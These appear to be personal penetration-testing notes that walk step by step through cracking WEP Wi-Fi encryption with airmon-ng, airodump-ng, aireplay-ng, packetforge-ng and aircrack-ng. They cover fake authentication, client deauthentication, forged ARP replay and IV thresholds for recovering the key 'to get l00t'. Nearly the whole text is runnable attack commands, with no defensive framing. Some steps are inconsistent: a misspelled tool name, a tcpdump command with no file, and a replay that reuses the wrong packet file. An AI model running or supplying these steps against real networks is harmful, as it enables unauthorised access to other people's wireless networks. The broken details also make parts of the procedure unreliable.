Start your WiFi card in monitor mode on a specific channel: airmon-ng start wlan1 [CHANNEL]
Run airodump-ng and write to a file: airodump-ng -c [CHANNEL] –bssid [BSSID] -w [FILE] wlan1mon - if you don't specify the channel then it will hop whgen you perform an attack
Perform the fake authentication attack: aireplay-ng -1 0 -e [ESSID] -a [BSSID] -h [OurMACAddress] wlan1mon
Run airodump-ng while performing this attack and output the results to a file in order to run aircrack-ng on it with the following commands:
Run airodump with the appropriate settings: airodump-ng -c [CHANNEL] --bssid [BSSID] -w [FILENAME] wlan1mon
Ensure that you are authenticated into the network via a fake authentication attack: aireplay-ng -1 0 -e [ESSID] -a [AP MAC] -h [OurMACAddress] wlan1mon
Use packetforge-ng to generate an ARP request packet with the XOR file: packetforge-ng -0 -a [AP MAC] -h [OurMACAddress] -l [SourceIP e.g. 192.168.1.100] -k [DestinationIP e.g. 192.168.1.255] -y [.xor FILE] -w arprequest
Replay this packet with aireplay.ng: aireplay.ng -2 -r arprequest.cap wlan1mon
Identify the packet a little more to discover information about the network: tcpdump -s 0 -n -e -r
Craft a packet to replay: packetforge-ng -0 -a [AP MAC] -h [OurMACAddress] -l [SourceIP e.g. 192.168.1.100] -k [DestinationIP e.g. 192.168.1.255] -y [.xor FILE] -w arpkorek
Replay this packet with aireplay.ng: aireplay.ng -2 -r arprequest.cap wlan1mon
Run aircrack-ng against the packet capture while replaying to crack the key and get l00t.
Deauthenticate a client copnnected to the AP: aireplay-ng -0 1 -a [AP MAC] -c [Client MAC] wlan1mon
Wait for a notification in airodump-ng stating that the keystream has been captured which will generate a .xor file
Attempt to authenticate using the capture: aireplay-ng -1 0 -e [ESSID] -y [.xor FILENAME] -a [AP MAC] -h [OurMACAddress] wlan1mon
We can also modify the above authentication with an association timing to prevent timeouts: aireplay-ng -1 6000 -e [ESSID] -y [.xor FILENAME] -a [AP MAC] -h [OurMACAddress] wlan1mon
This will give us a foothold to carry out other attacks such as ARP replaying and utilizing aircrack.ng
If we were to pursue this approach we could run the following command: aireplay-ng -3 -b [AP MAC] -h [OurMACAddress] wlan1mon
Finally, we would run aircrack.ng while running the ARP replay attack to get l00t.
I have removed Pyrit as it is no longer contained in the default repos of Kali. I strongly believe that aircrack-ng and coWPAtty are sufficient enough. However, Pyrit is still useful in some cases so I have included it in these notes.
The number of initialization vectors (IVs) that you need to determine the WEP key varies dramatically by key length and access point. Typically you need 250,000 or more unique IVs for 64 bit keys and 1.5 million or more for 128 bit keys.
Generally, don't try to crack the WEP key until you have 200,000 IVs or more. If you start too early, aircrack tends to spend too much time brute forcing keys and not properly applying the statistical techniques.
Start by trying 64 bit keys “aircrack-ng -n 64 [FILENAME]"
It is surprising how many APs only use 64 bit keys. If it does not find the 64 bit key in 5 minutes, restart aircrack in the generic mode: “aircrack-ng captured-data.cap”. Then at each 100,000 IVs mark, retry the “aircrack-ng -n 64 captured-data.cap” for 5 minutes.
Once you hit 600,000 IVs, switch to testing 128 bit keys. At this point it is unlikely (but not impossible) that it is a 64 bit key and 600,000 IVs did not crack it. So now try “aircrack-ng captured-data.cap”.
Once you hit 2 million IVs, try changing the fudge factor to “-f 4”. Run for at least 30 minutes to one hour. Retry, increasing the fudge factor by adding 4 to it each time. Another time to try increasing the fudge factor is when aircrack-ng stops because it has tried all the keys.